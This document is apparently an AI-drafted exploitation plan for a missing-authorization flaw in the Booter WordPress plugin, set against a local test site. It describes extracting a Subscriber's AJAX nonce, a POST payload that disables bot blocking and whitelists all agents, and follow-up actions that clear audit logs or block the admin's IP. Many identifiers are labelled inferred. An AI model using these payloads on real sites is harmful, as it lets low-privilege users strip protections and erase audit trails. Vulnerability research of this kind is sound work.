Booter <= 1.5.7 - Missing Authorization

This research plan outlines the steps required to analyze and exploit CVE-2026-24534, a Missing Authorization vulnerability in the Booter plugin for WordPress.

1. Vulnerability Summary

The Booter – Bots & Crawlers Manager plugin (<= 1.5.7) fails to perform adequate capability checks on its AJAX administrative functions. Specifically, while the plugin may use nonces to prevent CSRF, it does not verify if the authenticated user has the manage_options capability (or similar administrative permissions) before performing sensitive actions. This allows any authenticated user, including those with Subscriber roles, to execute unauthorized administrative actions, such as modifying plugin settings or clearing logs.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: booter_save_settings (inferred) or booter_clear_logs (inferred).
• Vulnerable Hook: add_action( 'wp_ajax_booter_save_settings', ... ).
• Required Authentication: Any authenticated user (Subscriber level or higher).
• Preconditions: The attacker must be logged in and obtain a valid AJAX nonce if the handler calls check_ajax_referer.

3. Code Flow

1. The plugin registers an AJAX handler in its main file or admin class:

   // Inferred registration
   add_action( 'wp_ajax_booter_save_settings', 'booter_save_settings_callback' );
   

2. The callback function booter_save_settings_callback is executed when a POST request is sent to admin-ajax.php with action=booter_save_settings.
3. The callback likely verifies a nonce:

   check_ajax_referer( 'booter_nonce', 'security' ); // Inferred identifiers
   

4. The Flaw: The callback missing a capability check like:

   if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }
   

5. The function proceeds to update the plugin's configuration in the database:

   update_option( 'booter_settings', $_POST['settings'] );
   

4. Nonce Acquisition Strategy

The plugin likely enqueues a script and localizes a nonce for its AJAX operations. Because the vulnerability is authenticated (Subscriber+), we must find a way for a Subscriber to access this nonce.

1. Identify Localization: Search the source code for wp_localize_script. Look for the object name and nonce key.
   • Likely Object: booter_ajax_obj (inferred)
   • Likely Key: nonce or security (inferred)
2. Locate Enqueue: Determine where the script is enqueued. If it's enqueued on all admin pages (admin_enqueue_scripts), a Subscriber can simply visit /wp-admin/profile.php.
3. Extraction:
   • Log in as a Subscriber.
   • Navigate to the WordPress Dashboard (/wp-admin/index.php).
   • Use browser_eval to extract the nonce:

     // Example: check common localization patterns
     window.booter_vars?.nonce || window.booter_php_vars?.security
     

5. Exploitation Strategy

We will attempt to disable the bot-blocking functionality or clear logs.

• Step 1: Identify the Action and Parameters
  Grep the plugin folder for wp_ajax_ to find the exact action name.

  grep -rn "wp_ajax_" .
  

• Step 2: Identify the Settings Key
  Find the function handling the save and see which $_POST parameters it reads.
• Step 3: Construct Payload
  If the action is booter_save_settings and it expects a settings array:
  • URL: http://vulnerable-wp.local/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:

    action=booter_save_settings&security=[NONCE]&settings[enable_blocking]=0&settings[whitelist_all]=1
    

6. Test Data Setup

1. Install Plugin: Ensure Booter <= 1.5.7 is installed and activated.
2. Configure Plugin: As an admin, enable bot blocking and set a specific blocked user agent (e.g., "EvilBot").
3. Create Attacker: Create a user with the Subscriber role.

   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
   

7. Expected Results

• The admin-ajax.php request should return a 200 OK response or a success JSON (e.g., {"success":true}).
• The plugin configuration in the wp_options table should be modified to reflect the attacker's payload (e.g., blocking disabled).

8. Verification Steps

1. Check Database: Use WP-CLI to verify the option has changed.

   wp option get booter_settings
   

2. Observe Behavior: If the exploit disabled blocking, a request with a previously blocked User-Agent should now succeed.

9. Alternative Approaches

If booter_save_settings is not the vulnerable function, look for other AJAX actions:

• booter_clear_logs: Attempt to delete audit trails.
• booter_add_blacklist: Attempt to block the admin's IP address.
• booter_reset_stats: Attempt to clear plugin statistics.

Grep Command for discovery:

# Find all AJAX callbacks and check for current_user_can
grep -r "add_action.*wp_ajax_" . | cut -d"'" -f4 | while read action; do
    echo "Checking action: $action"
    grep -r "function $action" . -A 20 | grep -v "current_user_can"
done

(Note: This logic helps find functions that lack the check within the first 20 lines of the callback).